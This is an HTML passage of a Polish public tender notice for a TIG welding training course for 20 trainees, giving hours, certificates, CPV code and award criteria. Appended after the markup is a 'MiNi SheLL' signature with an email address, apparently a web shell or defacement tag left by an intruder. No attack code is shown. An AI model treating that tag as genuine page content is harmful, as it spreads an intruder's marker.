<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia /Spawanie blach i rur spoinami pachwinowymi metoda TIG (141)/ dla 20 osób (w 2-ch grupach po 10 osób). Szkolenie winno obejmować minimum 134 godziny zegarowe w tym minimum 103 godziny zajęć praktycznych. Szkolenie musi być realizowane zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach. Szkolenie musi trwać średnio nie mniej niż 30 godzin zegarowych w tygodniu. Szkolenie nie może przekroczyć 40 godzin zegarowych w tygodniu. Zajęcia realizowane od poniedziałku do piątku. Przy jednym stanowisku praktycznej nauki zawodu mogą pracować maksymalnie 2 osoby. Absolwent szkolenia otrzymuje książeczkę spawacza, świadectwo egzaminu spawacza oraz zaświadczenie o ukończeniu szkolenia zgodne z wzorem (załącznik nr 8 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 29.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. EFEKTYWNOŚĆ/WSPÓŁPRACA  (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.20</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com